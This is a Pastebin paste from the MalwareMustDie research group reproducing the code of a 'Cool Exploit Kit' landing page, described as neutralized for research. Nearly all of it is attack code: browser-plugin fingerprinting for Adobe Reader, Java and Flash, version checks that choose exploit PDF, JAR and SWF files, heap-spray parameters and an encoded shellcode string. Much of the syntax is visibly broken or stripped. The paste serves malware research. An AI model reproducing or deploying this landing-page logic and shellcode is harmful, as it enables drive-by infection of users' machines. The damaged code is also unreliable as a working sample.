SHARE
TWEET

#MalwareMustDie - Cool Exploit Landing Page -2- 20130114

MalwareMustDie Jan 14th, 2013 224 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie
  2. // Cool Exploit Landing Page Code Structure...
  3. // Is a Neutralized Code. for research purpose.
  4.  
  5. <html>
  6. <head>
  7. <title>Fund Wipe</title>
  8. <link href="favicon.ico" rel="shortcut icon" type="image/x-icon" /
  9. <meta http-equiv="Content-Type" content="text/html" /
  10.  
  11. // ====================================================
  12. // first script...
  13. // ====================================================
  14. <script type='text/javascript'
  15.  
  16.  pull=false;
  17.  Roar=0;
  18.  if(navigator.plugins && navigator.plugins.length)
  19.  {
  20.    for(var Afternoon=0; Afternoon<navigator.plugins.length;Afternoon++)
  21.    {
  22.      if(navigator.plugins[Afternoon].description.indexOf('Adobe Acrobat')!-1)
  23.      {
  24.        Roar=parseFloat(navigator.plugins[Afternoon].description.split('Version ')[1]);
  25.        pull=true;
  26.        break
  27.      }
  28.      if(navigator.plugins[Afternoon].description.indexOf('Adobe PDF')!-1)
  29.      {
  30.        pull=true;
  31.        break
  32.      }
  33.    }
  34.  }
  35.  else if (window.ActiveXObject)
  36.  {
  37.    var control = null;
  38.    try
  39.    {
  40.      control = new ActiveXObject('AcroPDF.PDF');
  41.    }
  42.    catch (e)
  43.    {
  44.    }
  45.    if (!control)
  46.    {
  47.      try
  48.      {
  49.        control = new ActiveXObject('PDF.PdfCtrl');
  50.      }
  51.      catch (e)
  52.      {
  53.      }
  54.    }
  55.    if (control)
  56.    {
  57.      isInstalled = true;
  58.      version = control.GetVersions().split(',');
  59.      version = version[0].split('=');
  60.      version = parseFloat(version[1]);
  61.      Roar=version;
  62.      pull=true;
  63.    }
  64.  }
  65.  Roar=parseInt(Roar);
  66. /script>
  67.  
  68. // --------------------------------------------
  69. // Some htmls..
  70. // --------------------------------------------
  71. /head>
  72. <body>
  73. <div id="heap_allign"></div>
  74. <div id="table_div"></div>
  75. Fireplace Exaggerate Enlighten Grain<center>Bride Monster Roast Cinema</center>
  76. insight suicide auction usage fireplace race worse precaution core module indication relaxation often sweeten postpone appalling spending boast leadership videotaped chair tune
  77.  
  78.  
  79. // ====================================================
  80. // a java applet
  81. // ====================================================
  82.  
  83. <applet archive="/news/tentative.jar" code="hw.class" width="300" height="300" type="application/x-java-applet;version=1.6"></applet>
  84.  
  85.  
  86. // --------------------------------------------
  87. // some texts..
  88. // --------------------------------------------
  89. TERMINATE DEPOT ELECTORAL ENQUIRY EYE EXERCISE SPOUSE GLEE<h3>EDITOR MAGAZINE CONFIRM NARRATIVE</h3><small>attention vessel bolt</small>prevalence myself articulate liberate attractive lower ale precision abandon herself stair wish reality glimpse bass magical colour monster slip strap tax available probe banking mystery specialise
  90.  
  91.  
  92. // ====================================================
  93. // SECOND SCRIPT - first part is a condensed javascript....
  94. // ====================================================
  95.  
  96. <script>function HAIRY(POWDER, ATOMIC)var proceeding_ ='7817';var hammer ='COMMENTARY DISGUST GREET BITE';} proprietor = 943;if ( proprietor>=195){document.body.appendChild(document.createElement("p","Deck Venture Lion Firmly Keen Jail Surprising")); document.body.appendChild(document.createElement("p","1182"));document.body.appendChild(document.createElement("p","evolve secretly region meadow"));else if(proprietor<=240){document.body.appendChild(document.createElement("p","Insult Buy Avoidance Document Sunday Rightly Unify")); var differencecentre ="Well Administer Shout Constant Rabbi Journalist";var SURFACE=[0,0,0,0];tryvar statement=function()var refer={Heredity:null,exceed:null,Offer:'application/npruntime-scriptable-plugin;DeploymentToolkit',Orchestra:'application/java-deployment-toolkit',Century:null,Sand:null,CHORD:function()var immense=new Array();if(this.OUGHT())var POORLY=this.Want();var Them=POORLY.jvms;for(var i=0;i<Them.getLength();i++){immense[i]=Them.get(i).version}}elsevar br = this.g6();if(br=='MSIE')if(this.ax('1.7.0')){immense[0]'1.7.0'else if(this.ax('1.6.0')){immense[0]'1.6.0'else if(this.ax('1.5.0')){immense[0]'1.5.0'else if(this.ax('1.4.2')){immense[0]'1.4.2'else if(this.tm()){immense[0]'1.1'}}else if(br=='Netscape Family')this.gj();if(this.Heredity!null){immense[0]this.Heredityelse if(this.tt('1.7')){immense[0]'1.7.0'else if(this.tt('1.6')){immense[0]'1.6.0'else if(this.tt('1.5')){immense[0]'1.5.0'else if(this.tt('1.4.2')){immense[0]'1.4.2'}}}return immense},ax:function(h)var on='JavaWebStart.isInstalled.'+h+'.0';if(typeof ActiveXObject=='undefined'||!ActiveXObject)return false;tryreturn (new ActiveXObject(on)!null)catch(exception)return false}},tm:function()var clsid='{08B0E5C0-4FCB-11CF-AAA5-00401C608500}';if (typeof oClientCaps!'undefined')var v=oClientCaps.getComponentVersion(clsid,"ComponentID");if((v=='')||(v=='5,0,5000,0'))return falseelsereturn true}}elsereturn false}},tt:function(ga)if(!navigator.mimeTypes)return false;for(var i=0;i<navigator.mimeTypes.length;++i){s=navigator.mimeTypes[i].type;var m=s.match(/^application\/x-java-applet;version=(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(m!null)if(this.cv(m[1],ga))return truereturn false,cv:function(ib,rq)var a=ib.split('.');var b=rq.split('.');for(var i=0;i<a.length;++i)a[i]Number(a[i]);for(var i=0;i<b.length;++i)b[i]Number(b[i]);if(a.length==2)a[2]0;if(a[0]>b[0])return true;if(a[0]<b[0])return false;if(a[1]>b[1])return true;if(a[1]<b[1])return false;if(a[2]>b[2])return true;if(a[2]<b[2])return false;return true,gj:function()for(var i=0;i<navigator.mimeTypes.length;++i)var s=navigator.mimeTypes[i].type;var m=s.match(/^application\/x-java-applet;jpi-version=(.*)$/);if(m!null)this.Heredity=m[1];if('Opera'!this.Sand)break}}},OUGHT:function()var pk=this.Want();if(pk&&pk.jvms)return trueelsereturn false}},ap:function()this.g6();return ('Safari'!this.Sand&&'Opera'!this.Sand),Want:function()this.rf();var r = null;if (this.ap())r = document.getElementById('deployJavaPlugin');return r},g6:function()if (this.Century == null)var br=navigator.userAgent.toLowerCase();if((br.indexOf('msie')!-1)&&(br.indexOf('opera')==-1))this.Century'MSIE';this.Sand'MSIE'else if(br.indexOf('iphone')!-1)this.Century'Netscape Family';this.Sand'iPhone'else if((br.indexOf('firefox')!-1)&&(br.indexOf('opera')==-1))this.Century'Netscape Family';this.Sand'Firefox'else if(br.indexOf('chrome')!-1)this.Century'Netscape Family';this.Sand'Chrome'else if(br.indexOf('safari')!-1)this.Century'Netscape Family';this.Sand'Safari'else if((br.indexOf('mozilla')!-1)&&(br.indexOf('opera')==-1))this.Century'Netscape Family';this.Sand'Other'else if(br.indexOf('opera')!-1)this.Century'Netscape Family';this.Sand'Opera'elsethis.Century'?';this.Sand'unknown'}}return this.Century,wt:function()var br=this.g6();if(br=='MSIE'){document.write('<'+'object classid="clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" '+'id="deployJavaPlugin" width="0" height="0">'+'<'+'/'+'object'+'>')else if(br=='Netscape Family'&&this.ap())this.we()}},rf:function(){navigator.plugins.refresh(false);var br=this.g6();if(br=='Netscape Family'&&this.ap())var pj=document.getElementById('deployJavaPlugin');if(pj==null)this.we()}},we: function()var wn=false;if(navigator.mimeTypes!null)for(var i=0;i<navigator.mimeTypes.length;i++)if(navigator.mimeTypes[i].type==this.Orchestra)if(navigator.mimeTypes[i].enabledPlugin){document.write('<'+'embed id="deployJavaPlugin" type="'+this.Orchestra+'" hidden="true" />');wn=true}}if(!wn)for(var i=0;i<navigator.mimeTypes.length;i++)if(navigator.mimeTypes[i].type==this.Offer)if(navigator.mimeTypes[i].enabledPlugin)document.write('<'+'embed id="deployJavaPlugin" type="'+this.Offer+'" hidden="true" />')}}};refer.wt();if(refer.exceed==null)var l2=null;if(l2==null)try{l2=navigator.userLanguagecatch(err){pump_thanks=608; if ( pump_thanks<319){document.body.appendChild(document.createElement("p",'9783'));var wave_anger ='largescale everyday';var xraypollution='Storage Pop Survive Rising Clerical Shopkeeper';}}if(l2==null)try{l2=navigator.systemLanguagecatch(err){}if(l2==null)try{l2=navigator.languagecatch(err){}if(l2!null){l2.replace("-","_");refer.exceed=l2}}return refer}();var SURFACE=statement.CHORD().toString().replace("_",".").split(".");function variable(STRENGTHEN){document.body.appendChild(document.createElement("p","758"));document.body.appendChild(document.createElement("p","THICK TRUCE HOW PATRON ADEQUATE IMMIGRANT"));for(var i=0;i<SURFACE.length;i++)SURFACE[i]=parseInt(SURFACE[i]);function occupation(APPEAL){document.body.appendChild(document.createElement("p",'166'));var vulnerablenovelist_ ='There Profound Respondent Extra';var noisy='9956';if(i<2){bureauindex = 642;if(bureauindex<= 802)var voucher_='bang science notion negotiate explicitly';var ion_="";document.body.appendChild(document.createElement("p","Blue Bin Precedent")); }SURFACE=[0,0,0,0]}}catch(e){}trace = 506 / 428; if( trace== 147) {document.body.appendChild(document.createElement("p","COURAGE DISAPPOINT PRECISION FLEE")); var ourselvesportrait_="rot excite act stance safeguard intense supplement";document.body.appendChild(document.createElement("p",'1337'));elsevar hopeless_comb="CURSE POTATO COMB LEGEND";function defect_lender(CARDBOARD, DELIGHTFUL, SWELL)var flatten_="1054"; var cultural_ ="57";document.body.appendChild(document.createElement("p",'801'));
  97.  
  98. // ======================================================================
  99. // continued by the next javascript un-condensed of the second script
  100. // =======================================================================
  101.  
  102.  if ((SURFACE[1]6&&SURFACE[0]0)||(SURFACE[1]==6&&SURFACE[3]33)||(SURFACE[1]==7&&SURFACE[3]9))
  103.  {
  104.    setTimeout('Grab();', 6480);
  105.  }
  106.  else
  107.  {
  108.    function ulcer_nasty(ask, local)
  109.    {
  110.      var door_ ="republican abolition";
  111.      var unclear_ ="educator pleased capital very";
  112.    }
  113.    Grab();
  114.    function minutedevil(Tray, Theft, Garage)
  115.    {
  116.      var enquiremore ="linger waiting rehearsal";
  117.      document.body.appendChild(document.createElement("p",""));
  118.      var fragment_ ='3552';
  119.    }
  120.  }
  121.  constitute_basin=null;
  122.  if(constitute_basin < 511)
  123.  {
  124.    var conceptual_aid='update meat beer insurance varying soccer';
  125.  }
  126.  else if(constitute_basin ==196)
  127.  {
  128.    document.body.appendChild(document.createElement("p",'8160'));
  129.    document.body.appendChild(document.createElement("p",'VOLUNTEER'));
  130.    document.body.appendChild(document.createElement("p","IMPULSE SAKE TREASURY EMOTIONAL GARDENER DISPOSE HERITAGE"));
  131.  }
  132.  function Grab()
  133.  {
  134.    retreat = true;
  135.    if ( retreat >132)
  136.    {
  137.      var carryaluminium ="6091";
  138.      document.body.appendChild(document.createElement("p","203"));
  139.    }
  140.    else if(retreat > 611)
  141.    {
  142.      var diagnosis_ ='7766';
  143.    }
  144.    if (pull||(Roar>0&&Roar<10))
  145.    {
  146.      var DETAIL=document.createElement('div');
  147.      function ATTENTIONAMATEUR(tactic, diameter, warrant)
  148.      {
  149.        var hey ='7221';
  150.        document.body.appendChild(document.createElement("p","8241"));
  151.        document.body.appendChild(document.createElement("p","Microphone Acceptable Exaggerate Fond Tide"));
  152.      }
  153.      DETAIL.innerHTML'<object data="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="200" height="100"><embed src="/'+(((Roar>0)&&(Roar<8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type="application/pdf" width="100" height="200" /></object>';
  154.      document.body.appendChild(DETAIL);
  155.      setTimeout('Feasible();', 6388);
  156.      bacondoll=true;
  157.      if ( bacondoll <=639)
  158.      {
  159.        document.body.appendChild(document.createElement("p",'8464'));
  160.      }
  161.      else if(bacondoll<= 829)
  162.      {
  163.        document.body.appendChild(document.createElement("p","PROMINENT SECURE"));
  164.        document.body.appendChild(document.createElement("p",'turnover colon'));
  165.        var security_='radius modesty';
  166.      }
  167.    }
  168.  }
  169.  function getCN()
  170.  {
  171.    return "/news/INDUSTRIAL1.SWF"
  172.  }
  173.  function getBlockSize()
  174.  {
  175.    return 1024
  176.  }
  177.  function getAllocSize()
  178.  {
  179.    return 1024*1024
  180.  }
  181.  function getAllocCount()
  182.  {
  183.    return 300
  184.  }
  185.  function getFillBytes()
  186.  {
  187.    var a='%'+'u'+'0'+'c'+'0c';
  188.    return a+a
  189.  }
  190.  function vfsq()
  191.  {
  192.    xz="%u";
  193.    var a="8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4f5!7064!7454!60b4!b5c5!c514!6474!1585!9404!c414!54d4!9444!b414!b574!f160!8181!c4f1!d4b1!11e4!e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59b1!7492!621a!6d2a!4c0b!6662!7d6a!6d7d!0c4b!e702!6d7d!8224!ce24!82d5!8a71!2df6!82d5!8a71!b3f6!a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8ed5!c3da!7de7!2482!b7f7!2482!2482!9697!53c2!0ac6!c281!2a9e!8217!5312!eec6!4444!60c4!53d2!fec6!a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b580!8050!c002!fec6!b1a1!e5a5!c0c2!fec6!f4b5!a5d4!c2c0!42fe!47c0!825a!9282!4cc2!a59a!a23c!7d3c!7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7dbc!bed2!83ba!3a67!3a4c!87d7!8e13!87ba!8282!7d82!8604!8724!8207!8282!0c82!ac1d!7d7d!0b7d!170c!24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17be!3867!b2de!c23a!5f3a!0fb2!423a!c7c0!4c7d!5ae6!4236!e43a!b25f!67c0!673a!d5ec!3173!3c9d!2f86!52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80b2!3ae5!dde7!05b2!c5d1!413a!3ad5!97e7!3c46!971c!ccd5!c0da!fac1!d53d!11e2!bee6!8681!093a!7d7d!d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a86!8681!c43a!b18e!1c77!d5c1!dacc!ffff!beff!508e!afbe!042e!0382!ef08!9ec3!6618!139c!0185!cfbe!4ecf!6638!1414!1414!".split("").reverse().join("");
  194.    return a["replace"](/!/g,xz)
  195.  };
  196.  getShellCode=vfsq;
  197.  function Archbishop()
  198.  {
  199.    try
  200.    {
  201.      try
  202.      {
  203.        var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
  204.        try
  205.        {
  206.          axo.AllowScriptAccess'always';
  207.        }
  208.        catch(e)
  209.        {
  210.          return '6,0,0';
  211.        }
  212.      }
  213.      catch(e)
  214.      {
  215.      }
  216.      return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];
  217.    }
  218.    catch(e)
  219.    {
  220.      try
  221.      {
  222.        if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)
  223.        {
  224.          return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];
  225.        }
  226.      }
  227.      catch(e)
  228.      {
  229.      }
  230.    }
  231.    return '0,0,0';
  232.  }
  233.  function Feasible()
  234.  {
  235.    var note=Archbishop().split(',');
  236.    if (((note[0]==10&&note[1]==0&&note[2]40)||(document&&(note[0]==10&&note[1]0)&&(note[0]==10&&note[1]2)))||window.document&&((note[0]==10&&note[1]==2&&note[2]159)||(note[0]==10&&note[1]2)))
  237.    {
  238.      var oSpan=document.createElement("div");
  239.      window["doc"+"ument"]["bo"+"dy"].appendChild(oSpan);
  240.      oSpan.innerHTML"<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='/news/definite2.swf' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed src='/news/definite2.swf' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'></embed></object>";
  241.    }
  242.  }
  243.  donatedisarm = null;
  244.  if(donatedisarm < 796)
  245.  {
  246.    document.body.appendChild(document.createElement("p","7282"));
  247.  }
  248.  try
  249.  {
  250.    document.body++;
  251.  }
  252.  catch(dsgsdg)
  253.  {
  254.  }
  255.  setTimeout(function()
  256.  {
  257.  }
  258.  ,9000);
  259.  document.write("<b style='color:red;font-size:50px'>" + SURFACE + "</b>");
  260.  </script>
  261.  
  262.  
  263. // --------------------------------------------
  264. // Some htmls....
  265. // --------------------------------------------
  266. HINGE LENGTHEN
  267. <div align='top' title='Discourse Similarly Enter Recorder Treatment'>Consensus Different Scar</div><hr>
  268. <acronym>Inquiry Ought Peak Incidence</acronym>
  269.  
  270. <article>Sell Scared Particle Upset</article><code>porter noble dream frightened</code>
  271.  
  272.  
  273. // ====================================================
  274. // Third Script is in here....
  275. // ====================================================
  276.  
  277. <script>
  278.  
  279.  great = 930;
  280.  if ( great> 927)
  281.  {
  282.    var vicious_actress='Terrorist Serious Maker Patch Dual';
  283.    var union ="731";
  284.    var active_='village';
  285.  }
  286.  else if(great>=627)
  287.  {
  288.    var technique_most_='7507';
  289.    document.body.appendChild(document.createElement("p","PAGE"));
  290.    var leisurepunishment ='5973';
  291.  }
  292.  function Deeply(Conquest)
  293.  {
  294.    document.body.appendChild(document.createElement("p",'1829'));
  295.  }
  296.  function HALFWAY(replace, tobacco)
  297.  {
  298.    document.body.appendChild(document.createElement("p","4696"));
  299.    document.body.appendChild(document.createElement("p","7442"));
  300.  }
  301.  function Associate(ABSENT)
  302.  {
  303.    document.body.appendChild(document.createElement("p","3002"));
  304.    var honestly_welcome="140";
  305.  }
  306.  function seeminglyconstitute(DEAF)
  307.  {
  308.    var sky ="PRIVACY";
  309.  }
  310. /script>
  311.  
  312.  
  313. <article>Linger White Mist Unexpected</article>
  314. RECIPIENT ITS PLEASE REGIMENT INHERENT CIVILIAN TIN RECKON PIT RELATION VOLUNTEER DECEMBER BREATH DEPART
  315.  
  316. // ====================================================
  317. // parts of embedded object PDF implemented.....
  318. // ====================================================
  319.  
  320. <noscript>
  321. <object data="/news/live1.pdf" type="application/pdf" width="100" height="300"
  322. <embed src="/news/live1.pdf" type="application/pdf" width="300" height="100" /></object>
  323. <object data="/news/Shore_Rightly2.pdf" type="application/pdf" width="300" height="300"><embed src="/news/Shore_Rightly2.pdf" type="application/pdf" width="200" height="200" /></object></noscript>
  324.  
  325.  
  326. // --------------------------------------------
  327. // Some HTMLS....
  328. // --------------------------------------------
  329. SANCTUARY PALM MONETARY THROUGH BIRTHDAY OPENING CRIMINAL BROTHER<center>Gram</center><br><i>Candle Blonde Even</i>
  330.  
  331.  
  332. // ====================================================
  333. // Fourth Javascript...
  334. // ====================================================
  335.  
  336. <script>
  337.  
  338.  expect=false;
  339.  if(expect== 844)
  340.  {
  341.    document.body.appendChild(document.createElement("p",'9121'));
  342.    document.body.appendChild(document.createElement("p","4252"));
  343.  }
  344.  recover_prison =218 /129;
  345.  if ( recover_prison < 125)
  346.  {
  347.    var smoothly="4329";
  348.    document.body.appendChild(document.createElement("p",'8158'));
  349.    var improved ='bitch';
  350.  }
  351.  wellconsistent= true;
  352.  if (wellconsistent == 339)
  353.  {
  354.    var assertiontakeover_="3798";
  355.    var donor_clarity_='Damaging Attainment Violin Rabbit';
  356.    var trouser="3367";
  357.  }
  358.  else if( wellconsistent> 684)
  359.  {
  360.    var frozenauthor_="5411";
  361.    var poll ="Recipe Main";
  362.    document.body.appendChild(document.createElement("p","8483"));
  363.  }
  364.  fluid =true;
  365.  if(fluid <= 631)
  366.  {
  367.    var regulationlacking_="decay flock inevitable";
  368.  }
  369.  
  370. /script>
  371.  
  372.  
  373. // --------------------------------------------
  374. // some ending htmls..
  375. // --------------------------------------------
  376. <article>CONFESSION RICE ALTER BOYFRIEND</article>
  377. CUTTING OFFICER UNSTEADY IMPRESS ILLEGAL WHENEVER ATTEMPT CHARM BAIL FOSTER NOBLEMAN
  378. /body>
  379. /html>
  380.  
  381. //--------
  382. #MalwareMustDie
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top